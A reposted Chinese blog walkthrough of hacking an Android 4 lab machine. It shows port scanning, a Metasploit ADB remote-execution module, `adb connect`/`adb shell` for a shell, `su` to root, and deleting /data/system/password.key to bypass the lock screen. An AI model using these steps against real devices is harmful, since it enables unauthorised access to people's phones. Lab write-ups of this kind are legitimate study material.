入侵Android系统

admin 2022年7月23日10:31:06评论74 views字数 983阅读3分16秒阅读模式
免责声明
由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!


原文地址:

https://www.cnblogs.com/guaishoujingling/p/11101649.html

0x01 信息收集

1)扫描目标IP和开放的端口

工具:ipscan.exe【扫描时间有点长,需耐心等待】

目标IP:192.168.31.125

 入侵Android系统

2)访问目标IP

目标开放了3个端口,分别是 5555、8080、22000
尝试访问8080端口,访问如图:

入侵Android系统


根据页面提示 说留了个后门,用POST方式提交。直接跑目录,可以看到出来一个 backdoor.php文件,访问后发现是假的后门,如图所示:

 入侵Android系统

3)查看开放端口上的服务

用nmap扫描开放端口 5555,有个freeciv?服务,经过网上查找是adb应用的服务端口

入侵Android系统

0x02 MSF漏洞利用

用msf5搜索adb的漏洞,结果有发现,找到了 16年的一个 远程命令执行漏洞,调用模块利用,如图:

 入侵Android系统

入侵Android系统

对模块进行相应的设定

命令:set RHOSTS 192.168.31.125【设定目标IP命令:set LHOST 192.168.31.103【设定本机IP

 入侵Android系统

0x03 Getshell

执行利用脚本以后,是无法反弹到shell的,需要用adb 去链接【kali上是没有adb的,需要安装:输入命令:sudo apt-get install adb】

1)第一步输入命令 adb connect 192.168.31.125:5555 

2)第二步输入命令 adb shell 即可拿到shell

3)发现拿到的shell是普通权限,输入 su 回车即可直接拿到root shell, 如图:

 入侵Android系统

0x04 清楚密码文件

在/data/system目录文件夹下找到密码文件password.key清除即可,如图:

 入侵Android系统

输入命令:rm password.key,直接删除即可

0x05 进入手机

删除密码文件后,进入Android4靶机,无需密码,直接回车即可进入系统,如图:

 入侵Android系统

入侵Android系统



往期推荐



xdcms 3.0.1代码审计

关于APP抓不到包的解决思路

一次信息泄露到越权支付的实战

红蓝对抗最全信息收集工具整理

入侵Android系统

原文始发于微信公众号(李白你好):入侵Android系统

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月23日10:31:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   入侵Android系统http://cn-sec.com/archives/1194501.html

发表评论

匿名网友 填写信息